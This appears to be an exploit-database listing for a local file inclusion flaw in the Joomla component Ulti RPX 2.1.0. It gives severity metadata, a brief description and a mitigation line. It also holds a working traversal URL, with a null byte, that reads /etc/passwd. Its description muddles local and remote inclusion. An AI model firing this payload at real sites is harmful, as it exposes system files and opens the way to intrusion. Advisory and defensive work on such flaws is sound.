header-logo
Suggest Exploit
vendor:
Ulti RPX
by:
jdc
7,5
CVSS
HIGH
Local File Include
98
CWE
Product Name: Ulti RPX
Affected Version From: 2.1.0
Affected Version To: 2.1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:ultijoomla:ulti_rpx:2.1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2010

Joomla component Ulti RPX 2.1.0 Local File Include

This vulnerability allows an attacker to include a file from a remote server that is accessible by the web server. This can be exploited to execute arbitrary PHP code by including files from external sources that contain malicious code.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in any file operations.
Source

Exploit-DB raw data:

Joomla component Ulti RPX 2.1.0 Local File Include
Version     : 2.1.0
Author      : jdc
Download : http://www.ultijoomla.com/downloads?func=fileinfo&id=33

http://site/index.php?option=com_rpx&controller=../../../../../etc/passwd%00 


jdc 2010

Navigation

Suggest Exploit

Services By CQR